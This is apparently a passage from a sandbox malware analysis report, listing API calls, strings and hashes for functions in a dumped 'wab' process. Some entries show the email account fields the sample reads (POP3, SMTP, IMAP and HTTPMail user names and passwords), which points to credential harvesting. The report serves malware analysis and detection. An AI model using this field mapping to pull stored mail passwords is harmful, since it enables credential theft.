                                                            control_flow_graph 443 40ba28-40ba3a 444 40ba87-40ba9b call 406c62 443->444 445 40ba3c-40ba52 call 407e20 _mbsicmp 443->445 467 40ba9d call 4107f1 444->467 468 40ba9d call 404734 444->468 469 40ba9d call 404785 444->469 470 40ba9d call 403c16 444->470 471 40ba9d call 410a9c 444->471 450 40ba54-40ba6d call 407e20 445->450 451 40ba7b-40ba85 445->451 457 40ba74 450->457 458 40ba6f-40ba72 450->458 451->444 451->445 453 40baa0-40bab3 call 407e30 459 40bab5-40bac1 453->459 460 40bafa-40bb09 SetCursor 453->460 461 40ba75-40ba76 call 40b5e5 457->461 458->461 462 40bac3-40bace 459->462 463 40bad8-40baf7 qsort 459->463 461->451 462->463 463->460 467->453 468->453 469->453 470->453 471->453
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Cursor_mbsicmpqsort
                                                            • String ID: /nosort$/sort
                                                            • API String ID: 882979914-1578091866
                                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                            • memset.MSVCRT ref: 00410E10
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                            • _mbscpy.MSVCRT ref: 00410E87
                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                            • API String ID: 889583718-2036018995
                                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                            • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                            • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                            • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                            • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                            • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004109F7
                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                              • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                            • memset.MSVCRT ref: 00410A32
                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                            • String ID:
                                                            • API String ID: 3143880245-0
                                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            • API String ID: 1033339047-0
                                                            • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                            • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                            • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                            • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@mallocmemcpy
                                                            • String ID:
                                                            • API String ID: 3831604043-0
                                                            • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                            • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                            • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                            • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                            • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CreateFontIndirect_mbscpymemset
                                                            • String ID: Arial
                                                            • API String ID: 3853255127-493054409
                                                            • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                            • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                            • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                            • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: strlen$_strcmpimemset
                                                            • String ID: /stext
                                                            • API String ID: 520177685-3817206916
                                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID:
                                                            • API String ID: 145871493-0
                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                            • String ID:
                                                            • API String ID: 4165544737-0
                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: EnumNamesResource
                                                            • String ID:
                                                            • API String ID: 3334572018-0
                                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                            • API String ID: 3963849919-1658304561
                                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004024F5
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                            • _mbscpy.MSVCRT ref: 00402533
                                                            • _mbscpy.MSVCRT ref: 004025FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$QueryValuememset
                                                            • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                            • API String ID: 168965057-606283353
                                                            • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                            • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                            • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                            • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                            • memset.MSVCRT ref: 0040128E
                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                            • String ID:
                                                            • API String ID: 2998058495-0
                                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                            • API String ID: 633282248-1996832678
                                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
